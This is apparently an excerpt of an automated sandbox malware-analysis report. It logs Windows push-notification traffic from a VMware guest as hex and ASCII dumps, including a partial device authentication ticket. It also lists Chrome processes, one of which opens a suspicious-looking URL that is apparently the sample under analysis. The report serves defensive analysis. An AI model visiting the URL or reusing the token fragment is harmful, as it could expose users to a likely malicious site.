                        2024-07-03 12:39:43 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:43 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 73 42 33 49 58 58 47 48 70 45 36 54 58 42 4c 79 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 66 33 61 33 63 38 65 33 37 62 65 36 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: sB3IXXGHpE6TXBLy.2Context: 767f3a3c8e37be6e<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:43 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 42 33 49 58 58 47 48 70 45 36 54 58 42 4c 79 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 66 33 61 33 63 38 65 33 37 62 65 36 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: sB3IXXGHpE6TXBLy.3Context: 767f3a3c8e37be6e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2024-07-03 12:39:43 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:43 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 53 76 51 65 43 4e 68 4e 55 43 50 62 49 58 32 75 68 6d 6a 53 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: xSvQeCNhNUCPbIX2uhmjSA.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        40192.168.2.64976540.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 6b 49 74 52 6d 44 64 30 6b 4f 54 48 54 6d 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 38 61 34 31 37 62 62 39 38 33 32 34 62 37 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: IkItRmDd0kOTHTmf.1Context: 528a417bb98324b7
                        2024-07-03 12:39:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:51 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 49 6b 49 74 52 6d 44 64 30 6b 4f 54 48 54 6d 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 38 61 34 31 37 62 62 39 38 33 32 34 62 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: IkItRmDd0kOTHTmf.2Context: 528a417bb98324b7<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:51 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 49 6b 49 74 52 6d 44 64 30 6b 4f 54 48 54 6d 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 38 61 34 31 37 62 62 39 38 33 32 34 62 37 0d 0a 0d 0a
                        Data Ascii: BND 3 CON\QOS 56MS-CV: IkItRmDd0kOTHTmf.3Context: 528a417bb98324b7
                        2024-07-03 12:39:51 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:51 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2f 6d 56 5a 79 2f 65 4d 66 45 71 55 70 69 77 6d 70 43 4c 31 4a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: /mVZy/eMfEqUpiwmpCL1JQ.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        41192.168.2.64976940.115.3.253443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:40:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 51 35 53 4e 6e 57 50 32 6b 53 30 39 4c 69 42 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 62 61 62 36 38 61 39 38 64 32 66 35 63 33 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: 5Q5SNnWP2kS09LiB.1Context: d1bab68a98d2f5c3
                        2024-07-03 12:40:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:40:07 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 35 51 35 53 4e 6e 57 50 32 6b 53 30 39 4c 69 42 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 62 61 62 36 38 61 39 38 64 32 66 35 63 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 5Q5SNnWP2kS09LiB.2Context: d1bab68a98d2f5c3<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:40:07 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 51 35 53 4e 6e 57 50 32 6b 53 30 39 4c 69 42 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 62 61 62 36 38 61 39 38 64 32 66 35 63 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 5Q5SNnWP2kS09LiB.3Context: d1bab68a98d2f5c3<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2024-07-03 12:40:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:40:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 50 48 55 67 61 76 64 71 30 4b 76 46 56 70 69 2b 52 6e 5a 54 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: BPHUgavdq0KvFVpi+RnZTg.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        42192.168.2.64977040.115.3.253443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:40:17 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 66 59 53 73 57 44 58 6a 78 55 2b 6f 4f 4b 71 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 30 64 34 33 64 64 63 31 66 66 34 61 32 33 66 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: fYSsWDXjxU+oOKq7.1Context: 90d43ddc1ff4a23f
                        2024-07-03 12:40:17 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:40:17 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 66 59 53 73 57 44 58 6a 78 55 2b 6f 4f 4b 71 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 30 64 34 33 64 64 63 31 66 66 34 61 32 33 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: fYSsWDXjxU+oOKq7.2Context: 90d43ddc1ff4a23f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:40:17 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 66 59 53 73 57 44 58 6a 78 55 2b 6f 4f 4b 71 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 30 64 34 33 64 64 63 31 66 66 34 61 32 33 66 0d 0a 0d 0a
                        Data Ascii: BND 3 CON\QOS 56MS-CV: fYSsWDXjxU+oOKq7.3Context: 90d43ddc1ff4a23f
                        2024-07-03 12:40:18 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:40:18 UTC58INData Raw: 4d 53 2d 43 56 3a 20 59 58 77 75 76 61 39 6f 6a 45 36 59 65 63 75 53 66 78 41 4e 39 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: YXwuva9ojE6YecuSfxAN9Q.0Payload parsing failed.


                        Click to jump to process

                        Click to jump to process

                        Click to jump to process

                        Target ID:0
                        Start time:08:38:57
                        Start date:03/07/2024
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                        Imagebase:0x7ff684c40000
                        File size:3'242'272 bytes
                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:2
                        Start time:08:39:00
                        Start date:03/07/2024
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1996,i,4856771794578444014,547560397401803930,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                        Imagebase:0x7ff684c40000
                        File size:3'242'272 bytes
                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:3
                        Start time:08:39:03
                        Start date:03/07/2024
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inpzk.useringimportdulcimer.ink/?=vxkncwole9"
                        Imagebase:0x7ff684c40000
                        File size:3'242'272 bytes
                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        No disassembly